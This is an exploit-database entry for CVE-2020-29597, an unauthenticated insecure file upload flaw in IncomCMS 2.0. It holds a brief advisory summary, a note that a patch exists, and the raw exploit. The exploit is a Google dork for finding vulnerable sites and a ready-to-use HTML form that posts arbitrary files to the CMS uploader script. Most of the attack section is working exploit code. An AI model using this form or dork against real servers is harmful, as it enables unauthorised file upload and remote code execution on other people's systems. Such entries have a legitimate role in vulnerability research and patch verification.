header-logo
Suggest Exploit
vendor:
IncomCMS
by:
MoeAlBarbari
9.8
CVSS
CRITICAL
Insecure File Upload
434
CWE
Product Name: IncomCMS
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: CVE-2020-29597
CPE: a:incomcms:incomcms:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: BackBox Linux
2020

IncomCMS 2.0 – Insecure File Upload

IncomCMS 2.0 is vulnerable to an insecure file upload vulnerability. An attacker can upload malicious files to the server without any authentication. This can lead to remote code execution and other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their installations to the latest version.
Source

Exploit-DB raw data:

# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage:  https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR